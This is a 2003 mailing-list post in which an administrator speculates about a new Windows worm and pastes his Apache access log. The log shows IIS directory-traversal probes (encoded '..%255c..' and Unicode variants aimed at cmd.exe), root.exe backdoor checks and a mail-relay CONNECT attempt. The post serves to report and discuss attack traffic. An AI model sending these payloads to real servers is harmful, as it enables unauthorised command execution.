[plug] Is there *another* Windows worm around?
Craig Ringer
craig at postnewspapers.com.au
Tue Jan 28 19:20:56 WST 2003
>>Some of my customer sites are being beaten to a pulp by inbound TCP
>>connections to random addresses at TCP port 80, at about triple the rate of
>>the current MS-SQL (slammer/sapphire) storm, and a steady background of
>>inbound connections to UDP port 137 at about half the MS-SQL rate.
Looks like it could be, yeah. Note all the requests for
../winnt/system32/cmd.exe and such. OTOH, many worms aim for cmd.exe one
way or another, so this could just be a resurgence of an old one. *lol*
maybe all the MS-SQL admins reinstalled their servers and forgot to
patch up IIS appropriately...
craig at firewall:~$ tail -n 25 /var/log/apache/access.log
202.131.128.228 - - [28/Jan/2003:05:11:11 +0800] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
202.131.128.228 - - [28/Jan/2003:05:11:14 +0800] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
202.131.128.228 - - [28/Jan/2003:05:11:16 +0800] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 249
202.131.128.228 - - [28/Jan/2003:05:11:18 +0800] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 249
202.131.128.228 - - [28/Jan/2003:05:11:20 +0800] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 265
202.131.128.228 - - [28/Jan/2003:05:11:22 +0800] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
202.131.128.228 - - [28/Jan/2003:05:11:24 +0800] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
202.131.128.228 - - [28/Jan/2003:05:11:27 +0800] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
202.131.128.228 - - [28/Jan/2003:05:11:29 +0800] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
202.131.128.228 - - [28/Jan/2003:05:11:32 +0800] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
202.131.128.228 - - [28/Jan/2003:05:11:34 +0800] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
202.131.128.228 - - [28/Jan/2003:05:11:39 +0800] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
202.131.128.228 - - [28/Jan/2003:05:11:42 +0800] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
212.103.155.206 - - [28/Jan/2003:06:08:46 +0800] "GET /sumthin HTTP/1.0"
404 201
80.117.49.128 - - [28/Jan/2003:06:38:33 +0800] "GET /~craig/mp3.html
HTTP/1.1" 200 25810
202.72.156.26 - - [28/Jan/2003:11:26:48 +0800] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 210
202.72.156.26 - - [28/Jan/2003:11:26:57 +0800] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 208
202.72.156.26 - - [28/Jan/2003:11:27:06 +0800] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
202.72.156.26 - - [28/Jan/2003:11:27:16 +0800] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
202.72.156.26 - - [28/Jan/2003:11:27:26 +0800] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
202.72.156.26 - - [28/Jan/2003:11:27:36 +0800] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 249
202.72.156.26 - - [28/Jan/2003:11:27:45 +0800] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 249
202.72.156.26 - - [28/Jan/2003:11:27:56 +0800] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 265
64.229.155.191 - - [28/Jan/2003:12:21:42 +0800] "CONNECT
maila.microsoft.com:25 / HTTP/1.0" 400 299
200.53.176.85 - - [28/Jan/2003:19:07:53 +0800] "GET /sumthin HTTP/1.0"
404 201
More information about the plug
mailing list